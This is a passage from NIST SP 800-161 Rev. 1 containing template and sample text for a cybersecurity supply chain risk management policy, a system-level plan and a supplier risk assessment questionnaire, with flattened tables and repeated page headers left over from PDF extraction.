• Develop an overall C-SCRM strategy and high-level implementation plan, policies, and
processes;
• Integrate supply chain risk management practices throughout the acquisition and asset
management life cycle of covered articles;
• Share C-SCRM information in accordance with industry-wide criteria and guidelines; and
• Guide and oversee implementation progress and program effectiveness.
The C-SCRM Program shall:
• Be centrally led and coordinated by designated senior leadership who shall function as [
the enterprise’s] C-SCRM Program Executive and chair the C-SCRM Program
Management Office (PMO);
• Leverage and be appropriately integrated into [the enterprise’s] existing risk management
and decision-making governance processes and structures;
• Reflect a team-based approach and be collaborative, interdisciplinary, and intra-
enterprise in nature and composition;
• Incorporate a Level risk management approach that is consistent with the NIST Risk
Management Framework and NIST SP 800-161, Rev. 1; and
• Implement codified and regulatory C-SCRM requirements and industry-wide and
enterprise-specific policy direction, guidance, and processes.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
206
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Sample Level 2 Text
[The mission and business process’s] C-SCRM Program shall:
• Operate in accordance with the requirements and guidance set forth by [the enterprise’s]
C-SCRM Program;
• Collaborate with the C-SCRM Program Management Office (PMO) to apply the C-
SCRM practices and capabilities needed to assess, respond to, and monitor cybersecurity
risks arising from pursuit of [the mission and business process’s] core objectives;
• Integrate C-SCRM activities into applicable activities to support [the enterprise’s]
objective to manage cybersecurity risks throughout the supply chain;
• Assign and dedicate the resources needed for coordinating C-SCRM activities within [the
mission and business process];
• Identify [the mission and business process’s] critical suppliers, and assess the level of risk
exposure that arises from that relationship;
• Implement risk response efforts to reduce exposure to cybersecurity risks throughout the
supply chain; and
• Monitor [the mission and business process’s] ongoing cybersecurity risk exposure in the
supply chain profile, and provide periodic reporting to identified enterprise risk
management and C-SCRM stakeholders.
2.1.4. Roles and Responsibilities
State those responsible for the C-SCRM policies, as well as its key contributors. Include the role
and name of each individual or group, as well contact information where necessary (e.g.,
enterprise affiliation, address, email address, and phone number).
Sample Level 1 Text
• The C-SCRM Program Executive shall be responsible for:
o Leading the establishment, development, and oversight of the C-SCRM Program
in coordination and consultation with designated C-SCRM Leads.
o Establishing and serving as the Chair of the C-SCRM PMO. This team will be
comprised of the chair and the designated C-SCRM Leads and will be responsible
for developing and coordinating C-SCRM strategy, implementation plans, and
actions that address C-SCRM-related issues; program reporting and oversight;
and identifying and making program resource recommendations.
o Escalating and/or reporting C-SCRM issues to Senior Officials, as may be
appropriate.
• Each C-SCRM Security Officer shall be responsible for:
o Identifying C-SCRM Leads (the Lead will be responsible for participating as a
collaborative and core member of the C-SCRM PMO);
o Incorporating relevant C-SCRM functions into enterprise and position-level
functions; and
o Implementing and conforming to C-SCRM Program requirements.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
207
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Sample Level 2 Text
• C-SCRM Leads shall be responsible for:
o Representing the interests and needs of C-SCRM PMO members.
o Leading and/or coordinating the development and execution of program or
business-line C-SCRM plans. This shall include ensuring that such plans are
appropriately aligned to and integrated with the enterprise-level C-SCRM plan.
• The mission and business process C-SCRM staff shall be responsible for:
o The primary execution of C-SCRM activities (e.g., supplier or product
assessments) and
o Support for mission- and business-specific C-SCRM activities driven by non-C-
SCRM staff.
2.1.5. Definitions
List the key definitions described within the policy, and provide enterprise-specific context and
examples where needed.
Sample Text (Applies to Level 1 and/or Level 2)
• Covered Articles: Information technology, including cloud computing services of all
types; telecommunications equipment or telecommunications services; the processing of
information on a federal or non-federal information system, subject to the requirements
of the Controlled Unclassified Information program; and all IoT/OT (e.g., hardware,
systems, devices, software, or services that include embedded or incidental information
technology).
• Cybersecurity Supply Chain Risk Assessment: A systematic examination of
cybersecurity risks throughout the supply chain, the likelihoods of their occurrence, and
potential impacts.
• Risk Owner: A person or entity with the accountability and authority to manage a risk.
2.1.6. Revision and Maintenance
Define the required frequency for revising and maintaining the C-SCRM policy. Maintain a table
of revisions to enforce version control. C-SCRM policies are living documents that must be
updated and communicated to all appropriate individuals (e.g., staff, contractors, and suppliers).
Sample Text (Applies to Level 1 and/or Level 2)
[The enterprise’s] C-SCRM policy must be reviewed on an annual basis, at minimum, since
changes to laws, policies, standards, guidelines, and controls are dynamic and evolving.
Additional criteria that may trigger interim revisions include:
• A change of policies that impact the C-SCRM policy,
• Significant C-SCRM events,
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
208
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
• The introduction of new technologies,
• The discovery of new vulnerabilities,
• Operational or environmental changes,
• Shortcomings in the C-SCRM policy,
• A change of scope, and
• Other enterprise-specific criteria.
Table D-5: Version Management Table
Version
Number
Date
Description of
Change/Revision
Section/Pages
Affected
Changes made by
Name/Title/Enterprise
3. C-SCRM PLAN
The C-SCRM plan is developed at Tier 3, is implementation-specific, and provides policy
implementation, requirements, constraints, and implications. It can either be stand-alone or a
component of a system security and privacy plan. If incorporated, the C-SCRM components
must be clearly discernable. The C-SCRM plan addresses the management, implementation, and
monitoring of C-SCRM controls and the development and sustainment of systems across the
SDLC to support mission and business functions. The C-SCRM plan applies to high- and
moderate-impact systems per [FIPS 199].
Given that supply chains can differ significantly across and within enterprises, C-SCRM plans
should be tailored to individual programs, enterprises, and operational contexts. Tailored C-
SCRM plans provide the basis for determining whether a technology, service, system
component, or system is fit for purpose, and as such, the controls need to be tailored accordingly.
Tailored C-SCRM plans help enterprises focus their resources on the most critical mission and
business functions based on mission and business requirements and their risk environment.
The following C-SCRM plan template is provided only as an example. Enterprises have the
flexibility to develop and implement various approaches for the development and presentation of
the C-SCRM plan. Enterprises can leverage automated tools to ensure that all relevant sections
of the C-SCRM plan are captured. Automated tools can help document C-SCRM plan
information, such as component inventories, individuals filling roles, security control
implementation information, system diagrams, supply chain component criticality, and
interdependencies.
3.1. C-SCRM Plan Template
3.1.1. System Name and Identifier
Designate a unique identifier and/or name for the system. Include any applicable historical
names and relevant Tier 1 and Tier 2 document titles.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
209
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Sample Text
This C-SCRM plan provides an overview of the security requirements for the [system name]
[unique identifier] and describes the supply chain cybersecurity controls in place or planned for
implementation to provide fit-for-purpose C-SCRM controls that are appropriate for the
information to be transmitted, processed, or stored by the system.
The security safeguards implemented for the [unique identifier] meet the requirements set forth
in the enterprise’s C-SCRM strategy and policy guidance.
3.1.2. System Description
Describe the function, purpose, and scope of the system, and include a description of the
information processed. Provide a general description of the system’s approach to managing
supply chain risks associated with the research and development, design, manufacturing,
acquisition, delivery, integration, operations and maintenance, and disposal of the following
systems, system components, or system services.
Ensure that the C-SCRM plan describes the system in the context of the enterprise’s supply chain
risk tolerance, acceptable supply chain risk mitigation strategies or controls, a process for
consistently evaluating and monitoring supply chain risk, approaches for implementing and
communicating the plan, and a description of and justification for supply chain risk mitigation
measures taken. Descriptions must be consistent with the high-level mission and business
functions of the system; the authorization boundary of the system; the overall system
architecture, including any supporting systems and relationships; how the system supports
enterprise missions; and the system environment (e.g., stand-alone, managed/enterprise,
custom/specialized, security-limited functionality, cloud) established in Level 1 and Level 2.
Sample Text
[The enterprise’s] document management system (DMS) serves to provide dynamic information
repositories, file hierarchies, and collaboration functionality to streamline internal team
communication and coordination. The data managed within the system contains personally
identifiable information (PII). The DMS is a commercial off-the-shelf (COTS) solution that was
purchased directly from a verified supplier, [supplier’s name], within the United States. It has
been functionally configured to meet the enterprise’s needs. No third-party code libraries are
utilized to deploy or maintain the system. It is hosted within the management layer of the
enterprise’s primary virtual private cloud provider.
The DMS is a Category 1 system that mandates a recovery time objective (RTO) of 1 hour in the
event of downtime. The enterprise maintains a disaster recovery environment with a second
private cloud provider to which the enterprise can switch if the Category 1 RTO is not likely to
be met on the primary platform.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
210
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
3.1.3. System Information Type and Categorization
The following tables specify the information types that are processed, stored, or transmitted by
the system and/or its in-boundary supply chain. Enterprises utilize [NIST SP 800-60 v2], [NARA
CUI], or other enterprise-specific information types to identify information types and provisional
impact levels. Using guidance regarding the categorization of federal information and systems in
[FIPS 199], the enterprise determines the security impact levels for each information type.
Articulate the impact level (i.e., low, moderate, high) for each security objective (i.e.,
confidentiality, integrity, availability).
Sample Text
Table D-6: System Information Type and Categorization
Information Type
Security Objectives
Confidentiality
(Low, Moderate,
High)
Integrity
(Low, Moderate,
High)
Availability
(Low, Moderate,
High)
Based on the table above, indicate the high-water mark for each of the security impacts (i.e., low,
moderate, high). Determine the overall system categorization.
Table D-7: Security Impact Categorization
Security Objective
Security Impact Level
Confidentiality
Low
Moderate
High
Integrity
Low
Moderate
High
Availability
Low
Moderate
High
Overall System Security
Categorization
Low
Moderate
High
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
211
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
3.1.4. System Operational Status
Sample Text
Table D-8: System Operational Status
Indicate the operational status of the system. If more than one status is selected, list which part
of the system is covered under each status
3.1.5. System/Network Diagrams, Inventory, and Life Cycle Activities
Include a current and detailed system and network diagram with a system component inventory
or reference to where diagrams and inventory information can be found.
Contextualize the above components against the system’s SDLC to ensure that activities are
mapped and tracked. This guarantees full coverage of C-SCRM activities since these activities
may require repeating and reintegrating (using spiral or agile techniques) throughout the life
cycle. C-SCRM plan activities are required from concept all the way through development,
production, utilization, support, and retirement steps.
Sample Text
[System name] components may include:
• Component description
• Version number
• License number
• License holder
• License type (e.g., single user, public license, freeware)
• Barcode/property number
• Hostname (i.e., the name used to identify the component on a network)
• Component type (e.g., server, router, workstation, switch)
• Manufacturer
System Status
Operational
The system is currently operating and is in production.
Under Development
The system is being designed, developed, or implemented
Major Modification
The system is undergoing a major change, development, or
transition.
Disposition
The system is no longer operational.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
212
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
• Model
• Serial number
• Component revision number (e.g., firmware version)
• Physical location: (include specific rack location for components in computer/server
rooms)
• Vendor name(s)
3.1.6. Information Exchange and System Connections
List any information exchange agreements (e.g., Interconnection Security Agreements [ISA],
Memoranda of Understanding [MOU], Memoranda of Agreement [MOA]) between the system
and another system, the date of the agreement, the security authorization status of the other
systems, the name of the authorizing official, a description of the connection, and diagrams that
show the flow of any information exchange.
Sample Text
Table D-9: Information Exchange and System Connections
Agreement
Date
Name
of
System
Enterprise
Type of
Connection
or
Information
Exchange
Method
FIPS 199
Categorization
Authoriz
ation
Status
Authorization
Official
Name and Title
3.1.7. Security Control Details
Document C-SCRM controls to ensure that the plan addresses requirements for developing
trustworthy, secure, privacy-protective, and resilient system components and systems, including
the application of security design principles implemented as part of life cycle-based systems
security engineering processes. Consider relevant topic areas such as assessments, standard
operating procedures, responsibilities, software, hardware, products, services, and DevSecOps
considerations.
For each control, provide a thorough description of how the security controls in the applicable
baseline are implemented. Include any relevant artifacts for control implementation. Incorporate
any control-tailoring justification, as needed. Reference applicable Level 1 and/or Level 2 C-
SCRM policies that provide inherited controls where applicable. There may be multiple Level 1
policies that come from the CIO, CAO, or PMO.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
213
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Sample Text
SR‐6 SUPPLIER ASSESSMENTS AND REVIEWS
Implementation: As a part of a comprehensive, defense‐in‐breadth information security strategy,
the enterprise established a C-SCRM program to address the management of cybersecurity risks
throughout the supply chain. The C-SCRM PMO is responsible for conducting assessments of
cybersecurity risks that arise from business partners seeking to integrate with [system name] in
accordance with enterprise‐wide C-SCRM Level 2 policy requirements. C-SCRM training and
awareness materials must also be provided for all individuals prior to receiving access to [system
name].
Control Enhancements: Control enhancements 2, 7 and 8 from [NIST 800‐161] are applicable.
(2) SUPPLIER REVIEWS
Implementation: The C-SCRM PMO provides supplier reviews to business partners in the
form of SCRAs before entering into a contractual agreement to acquire information systems,
components, or services in relation to [system name]. The Level 1 strategy and Level 2
policy documents place SCRA requirements on business partners seeking to acquire IT
systems, components, and/or services. The SCRA provides a step‐by‐step guide for business
partners to follow in preparation for an assessment of suppliers by the C-SCRM PMO.
(7) ASSESSMENT PRIOR TO SELECTION/ACCEPTANCE/UPDATE
Implementation: The Level 2 policy defines what [system name] integration activities require
an SCRA. The process and requirements are defined in the SCRA Standard Operating
Procedure.
(8) USE OF ALL‐SOURCE INTELLIGENCE
Implementation: The C-SCRM PMO utilizes all‐source intelligence when conducting supply
chain risk assessments for [system name].
3.1.8. Role Identification
Identify the role, name, department/division, primary and alternative phone number, and email
address of key cybersecurity supply chain personnel or designate contacts (e.g., vendor contacts,
acquisitions subject matter experts [SME], engineering leads, business partners, service
providers) with a role, name, address, primary and alternative phone numbers, and email
address.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
214
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Sample Text
Table D-10: Role Identification
Role
Name
Department/
Division
Primary
Phone
Number
Alternative
Phone
Number
Email
Address
Vendor Contact
Acquisitions
SME
Engineering
Lead
Business
Partner
Service
Provider
3.1.9. Contingencies and Emergencies
For organizations that choose to acquires products in the event of contingency or emergency
operations, enterprises may need to bypass normal C-SCRM acquisition processes to allow for
mission continuity. Contracting activities that are not vetted using approved C-SCRM plan
processes introduce operational risks to the enterprise.
Where appropriate, describe abbreviated acquisition procedures to follow during contingencies
and emergencies, such as the contact information for C-SCRM, acquisitions, and legal subject
matter experts who can provide advice absent a formal tasking and approval chain of command.
Sample Text
In the event of an emergency where equipment is urgently needed, the C-SCRM PMO will offer
its assistance through C-SCRM subject matter experts (SMEs) to provide help in the absence of
formal tasking and chain of command approval. The CIO has the authority to provide such
waivers to bypass normal procedures. The current contact information for C-SCRM SMEs is
provided below:
• C-SCRM SME POC
Name
Email
Phone
• Acquisitions SME POC
Name
Email
Phone
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
215
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
• Legal SME POC
Name
Email
Phone
3.1.10. Related Laws, Regulations, and Policies
List any applicable laws, executive orders, directives, policies, and regulations that are
applicable to the system (e.g., Executive Order 14028, FAR, FERC, etc.). For Level 3, include
applicable Level 1 C-SCRM Strategy and Implementation Plans and Level 2 C-SCRM Policy
titles.
Sample Text
The enterprise shall ensure that C-SCRM plan controls are consistent with applicable statutory
authority, including the Federal Information Security Modernization Act (FISMA); regulatory
requirements and external guidance, including Office of Management and Budget (OMB) policy
and Federal Information Processing Standards (FIPS) publications promulgated by the National
Institute of Standards and Technology (NIST); and internal C-SCRM policies and strategy
documents.
The following references apply:
• Committee on National Security Systems. CNSSD No. 505. (U) Supply Chain Risk
Management (SCRM)
• NIST SP 800‐53, Rev. 5, Security and Privacy Controls for Information Systems and
Organizations
• NIST SP 800‐161, Rev. 1, Cybersecurity Supply Chain Risk Management Practices for
Systems and Organizations
• OMB Circular A‐130 Managing Information as a Strategic Resource
• Federal Acquisition Supply Chain Security Act of 2018
• Executive Order 14028 of May 12, 2021, Improving the Nation’s Cybersecurity
3.1.11. Revision and Maintenance
Include a table that identifies the date of the change, a description of the modification, and the
name of the individual who made the change. At a minimum, review and update Level 3 C-SCRM
plans at life cycle milestones, gate reviews, and significant contracting activities, and verify them
for compliance with upper tier plans as appropriate. Ensure that the plan adapts to the shifting
impacts of exogenous factors, such as threats and changes to the enterprise or environmental.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
216
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Sample Text
Table D-11: Revision and Maintenance
Version
Number
Date
Description of
Change/Revision
Section/Pages
Affected
Changes made by
Name/Title/Enterprise
3.1.12. C-SCRM Plan Approval
Include a signature (either electronic or handwritten) and date when the system security plan is
reviewed and approved.
Sample Text
Authorizing Official:
X
Name
Date
3.1.13. Acronym List
Include and detail any acronyms utilized in the C-SCRM plan.
Sample Text
Table D-12: Acronym List
Acronym
Detail
AO
Authorizing Official
C-SCRM
Cybersecurity Supply Chain Risk Management
SDLC
System Development Life Cycle
3.1.14. Attachments
Attach any relevant artifacts that can be included to support the C-SCRM plan.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
217
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Sample Text
• Contractual agreements
• C-SCRM plans of contractors or suppliers
3.1.15. C-SCRM Plan and Life Cycles
C-SCRM plans should cover the full SDLC of systems and programs, including research and
development, design, manufacturing, acquisition, delivery, integration, operations, and
disposal/retirement. The C-SCRM plan activities should be integrated into the enterprise’s
system and software life cycle processes. Similar controls in the C-SCRM plan can be applied in
more than one life cycle process. The figure below shows how the C-SCRM plan activities can
be integrated into various example life cycles.
Fig. D-1: Example C-SCRM Plan Life Cycle
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
218
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
4. CYBERSECURITY SUPPLY CHAIN RISK ASSESSMENT TEMPLATE
The Cybersecurity Supply Chain Risk Assessment (C-SCRA)43 guides the review of any third-
party product, service, or supplier44 that could present a cybersecurity risk to a procurer. The
objective of the C-SCRA template is to provide a toolbox of questions that an acquirer can
choose to use or not use depending on the controls selected. Typically executed by C-SCRM
PMOs at the operational level (Level 3), the C-SCRAC-SCRA considers available public and
private information to perform a holistic assessment, including known cybersecurity risks
throughout the supply chain, the likelihoods of their occurrence, and their potential impacts on an
enterprise and its information and systems. As enterprises may be inundated with C-SCRAC-
SCRAs and suppliers inundated with C-SCRAC-SCRA requests, the enterprise should evaluate
the relative priority of its C-SCRAC-SCRAs as an influencing factor on the rigor of the C-
SCRAC-SCRA.
As with the other featured templates, the below C-SCRAC-SCRA is provided only as an
example. Enterprises must tailor the below content to align with their Level 1 and Level 2 risk
postures. The execution of C-SCRAC-SCRA is perhaps the most visible and time-consuming
component of C-SCRM operations and must therefore be designed for efficient execution at
scale with dedicated support resources, templated workflows, and automation wherever possible.
Federal agencies should refer to Appendix E for additional guidance concerning supply chain
risk assessments.
4.1.
C-SCRM Template
4.1.1. Authority and Compliance
List the laws, executive orders, directives, regulations, policies, standards, and guidelines that
govern C-SCRAC-SCRA execution.
Sample Text
• Legislation
o Strengthening and Enhancing Cyber-capabilities by Utilizing Risk Exposure
Technology Act (SECURE) Technology of 2018
• Policies
o [Enterprise name] C-SCRA Standard Operating Procedures
o [Enterprise name] C-SCRA Risk Assessment Factors
o [Enterprise name] C-SCRA Criticality Assessment Criteria
• Guidelines
o NIST 800-53, Rev. 5: PM-30, RA-3, SA-15, SR-5
o NIST 800-37, Rev. 2
o NIST 800-161, Rev. 1: Appendix C
o ISO 28001:2007
43 For the purposes of this document, the expression “cybersecurity supply chain risk assessment” should be considered equivalent to “supply
chain risk assessment” in an effort to harmonize terminology.
44 A supplier may also refer to a source, as defined in the Strengthening and Enhancing Cyber-capabilities by Utilizing Risk Exposure
Technology Act (SECURE) Technology of 2018.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
219
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
4.1.2. Description
Describe the purpose and scope of the C-SCRA template, and reference the enterprise
commitment to C-SCRM and mandate to perform C-SCRAs as an extension of that commitment.
Outline the template’s relationship to enterprise risk management principles, frameworks, and
practices. This may include providing an overview of the enterprise’s C-SCRA processes,
standard operating procedures, and/or criticality designations that govern the usage of this
template.
Reinforce the business case for executing C-SCRA by highlighting the benefits of reducing
expected loss from adverse supply chain cybersecurity events, as well as the C-SCRM PMO’s
role in efficiently executing these assessments at scale.
Provide an overview of the enterprise’s boundaries, systems, and services within the scope of the
C-SCRAs.
List the contact information and other resources that readers may access in order to further
engage with the C-SCRA process.
Sample Text
This C-SCRA is intended to fairly and consistently evaluate risks posed to the [enterprise] via
third parties that hold the potential for harm or compromise as a result of cybersecurity risks.
Cybersecurity risk in the supply chain include exposures, threats, and vulnerabilities associated
with the products and services traversing the supply chain, as well as the exposures, threats, and
vulnerabilities to the supply chain and its suppliers.
The C-SCRA template provides tactical guidelines for the C-SCRM PMO to review
cybersecurity risk in the supply chain and ensure that C-SCRAs are appropriately, efficiently,
and effectively carried out in line with enterprise mandates.
Requestors seeking to introduce third-party products, services, or suppliers into enterprise
boundaries should familiarize themselves with the following template. This will ensure that
requestors can provide the requisite information to the C-SCRM PMO to ensure timely execution
of C-SCRAs and are otherwise aligned with adherence to the steps of the C-SCRA.
The C-SCRA process contains five primary steps, as outlined in the below template:45
1. Information Gathering and Scoping Analysis
2. Threat Analysis
3. Vulnerability Analysis
4. Impact Analysis
5. Risk Response Analysis
45 See Appendix D’s “Assess” section for the methodological principles and guidance that underpin these steps.
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
220
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
To learn more about the C-SCRA process and/or submit an assessment request to the C-SCRM
PMO, please go to [enterprise’s intranet page] or contact [C-SCRM PMO email].
4.1.3. Information Gathering and Scoping Analysis
Define the purpose and objectives for the requested C-SCRA, and outline the key information
required to appropriately define the system, operations, supporting architecture, and
boundaries. Provide key questions to requestors to facilitate the collection and analysis of this
information. The C-SCRM PMO will then use this information as a baseline for subsequent
analyses and data requests.
Sample Text
Table D-13: Information Gathering and Scoping Analysis
Supply Chain Risk Management Assessment Scoping
Questionnaire
Section 1: Request Overview
Provide Response:
Response
Provided by:
Requestor Name
Acquirer
C-SCRA Purpose and Objective
Acquirer
System Description
Acquirer
Architecture Overview
Acquirer
Boundary Definition
Acquirer
Date of Assessment
Acquirer
Assessor Name
Acquirer
Section 2: Product/Service Internal Risk Overview
What % of this supplier’s sales of this
product/service does your enterprise
consume?
Acquirer or
Supplier
How widely used is or will the product or
service be in your enterprise?
Acquirer
Is the product/service manufactured in a
geographic location that is considered an
area of geopolitical risk for your enterprise
based on its primary area of operation
(e.g., in the United States)?
Acquirer or
Supplier
Is the product manufactured or developed
in a country identified as a foreign
adversary or country of special concern?
Acquirer
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
221
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Would switching to an alternative supplier
for this product or service constitute
significant cost or effort for your
enterprise?
Acquirer
Does your enterprise have an existing
relationship with another supplier for this
product/service?
Acquirer
How confident is your enterprise that they
will be able to obtain quality
products/services regardless of major
supply chain disruptions, both human and
natural?
Acquirer
Does your enterprise maintain a reserve of
this product/service?
Acquirer
Is the product/service fit for purpose? (i.e.,
capable of meeting objectives or service
levels)?
Acquirer
Does the product/service perform an
essential security function? If so, please
describe.
Acquirer
Does the product/service have root access
to IT networks, OT systems, or sensitive
platforms?
Acquirer
Can compromise of the product/service
lead to system failure or severe
degradation?
Acquirer
In the event of compromise leading to
system failure or severe degradation, is
there a known independent reliable
mitigation?
Acquirer
Will/does the product/service connect to a
platform that is provided to customers by
your enterprise?
Acquirer
Will/does the product/service transmit,
generate, maintain, or process high value
data (e.g., PII, PHI, PCI)?
Acquirer
Will/does the product/service have access
to systems that transmit, generate, maintain
or process high value data (e.g., PII, PHI,
PCI)?
Acquirer
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
222
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Will/does the supplier require physical
access to the company’s facilities as a
result of its provision of the
product/service?
Acquirer
Based on holistic consideration of the
above responses, how critical is this
product/service to your enterprise (i.e.,
critical, high, moderate, low)?
Acquirer
Section 3: Supplier Overview
Have you identified the supplier’s critical
suppliers?
Supplier
Did you verify the supplier ownership,
whether foreign and domestic?
Supplier
If the supplier uses distributors, did you
investigate them for potential risks?
Supplier
Is the supplier located in the United States?
Supplier
Does the supplier have personnel and/or
professional ties (including its officers,
directors, or similar officials, employees,
consultants, or contractors) with any
foreign government?
Supplier
Is there foreign ownership, control, or
influence (FOCI) over the supplier or any
business entities involved in the supply
chain? If so, is the FOCI from a foreign
adversary of the United States or country
of concern?
Supplier
Do the laws and regulations of any foreign
country in which the supplier has
headquarters, research development,
manufacturing, testing, packaging,
distribution, or service facilities or other
operations require the sharing of
technology or data with that foreign
country?
Supplier
Has the supplier declared where
replacement components will be purchased
from?
Supplier
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
223
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Have the owners and locations of all of the
suppliers, subcontractors, and sub-tier
suppliers been identified and validated?
Supplier
Does the supplier employ the use of threat
scenarios to inform the vetting of sub-tier
suppliers?
Supplier
Does the supplier have documents that
track part numbers to manufacturers?
Supplier
Can the supplier provide a list of who they
procure hardware and software from that is
utilized in the performance of the contract?
Supplier
Does the supplier have counterfeit controls
in place?
Supplier
Does the supplier safeguard key program
information that may be exposed through
interactions with other suppliers?
Supplier
Does the supplier perform reviews and
inspections and have safeguards to detect
or avoid counterfeit equipment, tampered
hardware or software (HW/SW),
vulnerable HW/SW, and/or operations
security leaks?
Supplier
Does the supplier use industry standard
baselines (e.g., CIS, NES) when
purchasing software?
Supplier
Does the supplier comply with regulatory
and legislative mandates?
Supplier
Does the supplier have procedures for
secure maintenance and upgrades
following deployment?
Supplier
Section 4: Policies and Procedures
Does the supplier have definitive policies
and procedures that help minimize supply
chain risk, including subsidiary sourcing
needs?
Supplier
Does the supplier define and manage
system criticality and capabilities?
Supplier
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
224
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Does everyone associated with the
procurement (e.g., supplier, C-SCRM
PMO) understand the potential threats to
and risks in the subject supply chain?
Supplier
What is the citizenship of all engaged
personnel? If required, are all engaged
personnel US citizens?
Supplier
Does the supplier have “insider threat”
controls in place?
Supplier
Does the supplier verify and monitor all
personnel who interact with the subject
product, system, or service to know if they
pose a threat?
Supplier
Does the supplier use, record, and track
risk mitigation activities throughout the life
cycle of the product, system, or service?
Supplier
Have all of the supplier’s personnel signed
non-disclosure agreements?
Supplier
Does the supplier allow its personnel or
suppliers to remotely access environments?
Supplier
Section 5: Logistics (if applicable)
Does the supplier have documented
tracking and version controls in place?
Supplier
Does the supplier analyze events
(environmental or human-made) that could
interrupt their supply chain?
Supplier
Are the supplier’s completed parts
controlled so that they are never left
unattended or exposed to tampering?
Supplier
Are the supplier’s completed parts locked
up?
Supplier
Does the supplier have a process that
ensures integrity when ordering inventory
from their supplier?
Supplier
Is the supplier’s inventory periodically
inspected for exposure or tampering?
Supplier
Does the supplier have secure material
destruction procedures for unused and
scrap parts procured from their supplier?
Supplier
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
225
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
Is there a documented chain of custody for
the deployment of products and systems?
Supplier
Section 6: Software Design and Development (if applicable)
Is the supplier familiar with all of their
suppliers that will work on the design of
the product/system?
Supplier and
Manufacturer
Does the supplier align its SDLC to a
secure software development standard
(e.g., Microsoft Security Development Life
Cycle)?
Supplier and
Manufacturer
Does the supplier perform all development
onshore?
Supplier and
Manufacturer
Do only United States citizens have access
to development environments?
Supplier and
Manufacturer
Does the supplier provide cybersecurity
training to its developers?
Supplier and
Manufacturer
Does the supplier use trusted software
development tools?
Supplier and
Manufacturer
Is the supplier using trusted information
assurance controls to safeguard the
development environment (e.g., secure
network configurations, strict access
controls, dynamic/static vulnerability
management tools, penetration testing)?
Supplier and
Manufacturer
Does the supplier validate open source
software prior to use?
Supplier and
Manufacturer
Are the supplier’s software compilers
continuously monitored?
Supplier and
Manufacturer
Does the supplier have codified software
test and configuration standards?
Supplier and
Manufacturer
Section 7: Product- or Service-specific Security (if applicable, one
questionnaire per product/service)
Name of Product or Service
Manufacturer
Product Type (i.e., hardware, software,
service)
Manufacturer
Description of Product or Service
Manufacturer
Part Number (if applicable)
Manufacturer
NIST SP 800-161r1
CYBERSECURITY SUPPLY CHAIN RISK MANAGEMENT
PRACTICES FOR SYSTEMS AND ORGANIZATIONS
226
This publication is available free of charge from: https://doi.org/10.6028/NIST.SP.800-161r1
